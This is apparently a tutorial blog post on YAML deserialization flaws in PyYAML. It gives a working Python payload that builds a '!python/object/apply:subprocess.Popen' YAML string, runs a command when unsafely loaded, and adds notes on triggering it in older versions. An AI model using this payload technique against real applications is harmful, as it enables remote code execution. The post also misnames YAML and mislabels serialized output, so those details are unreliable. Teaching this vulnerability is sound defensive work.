Understanding YAML Deserialization Vulnerabilities and Mitigation
Written on
Chapter 1: Introduction to YAML Deserialization
Deserialization attacks are increasingly prevalent in programming languages like Java, Python, and Ruby. These vulnerabilities arise when data streams are deserialized without adequate validation, potentially allowing the execution of remote code. In this article, we will explore a specific deserialization technique within the context of YAML.
Before we delve into YAML deserialization, let's clarify the concepts of serialization and deserialization.
Section 1.1: What is Serialization?
Consider an online game where your character has various attributes such as username, avatar, clothing, rank, and weapons. How are these attributes communicated and stored on the server? The answer lies in serialization.
Defining Serialization
Serialization is the process of converting an object into a byte stream or a flat structure. This byte stream, often referred to as a simplified version of the object, can be transmitted over networks or saved in files, databases, and more.
Deserialization, the counterpart to serialization, is the process of transforming these byte streams back into their original object form.
Potential Vulnerabilities
The vulnerability arises when a web server accepts a serialized value without validating it before deserializing. If users can manipulate the serialized value, it could lead to unexpected behaviors during deserialization.
Section 1.2: What is YAML?
YAML, which stands for "Yet Another Markup Language," is defined by Wikipedia as "a human-readable data-serialization language." It is commonly employed for configuration files and in scenarios where data needs to be stored or transmitted. YAML utilizes Python-style indentation for nesting and features a compact format using [] for lists and {} for maps.
Unlike traditional programming languages, YAML lacks a strict format, making it distinct.
Example of YAML Serialization
Consider the following un-serialized data:
{
'name': 'Manish',
'age': 12,
'skills': ['programming', 'soft skills']
}
Upon serialization, it would appear as:
name: Manish
age: 12
skills:
- programming
- soft skills
Understanding Vulnerabilities in YAML
While this example is not inherently vulnerable, issues can arise when serialized objects are executed instead of merely deserialized. Libraries like PyYAML and ruamel.yaml are commonly used but can be prone to deserialization attacks if insecure methods are employed.
Serialization Methods
Common serialization methods include:
- dump()
- dump_all()
- safe_dump()
- safe_dump_all()
To deserialize, methods such as:
- load()
- load_all()
- full_load()
- full_load_all()
- safe_load()
- safe_load_all()
Chapter 2: Creating Payloads
To illustrate the creation of payloads, we utilize the __reduce__() method, which functions with both PyYAML and ruamel.yaml, assuming the backend operates on a Unix-based system.
import yaml
import subprocess
class Payload(object):
def __reduce__(self):
return (subprocess.Popen, ('ls',))
deserialized_data = yaml.dump(Payload())
print(deserialized_data)
The serialized output will be:
!python/object/apply:subprocess.Popen
- ls
Payload Explanation
In this example, we create a payload using the __reduce__() method and the subprocess module to spawn a new process. The Popen method executes a command, in this case, ls, which lists files in the current directory.
When this payload is input into a vulnerable web application, it not only deserializes but also executes the command.
deserialized_data = yaml.load(data)
The command executes successfully, revealing the contents of the current directory.
Remediation Strategies
This vulnerability was assigned CVE-2017-18342 and was patched in PyYAML version 5.1. It is advisable to ensure that your version of PyYAML is greater than 5.1 (the current version is 6.0).
However, if you wish to bypass this vulnerability, it depends on the version in use. While certain unsafe methods can be executed, specific conditions must be met.
Note: If attempting this, consider using PyYAML version < 5.1. The load() method will fail with the above payload unless you specify "Loader=Loader" or change it to unsafe_load(data, Loader=Loader).
Conclusion
Deserialization vulnerabilities can lead to severe repercussions, including remote code execution or privilege escalation. Therefore, it is crucial to sanitize and validate any incoming data before deserializing it.
Learn how to deserialize YAML in C# with YamlDotNET.
A comprehensive YAML course from beginner to advanced, particularly for DevOps and more!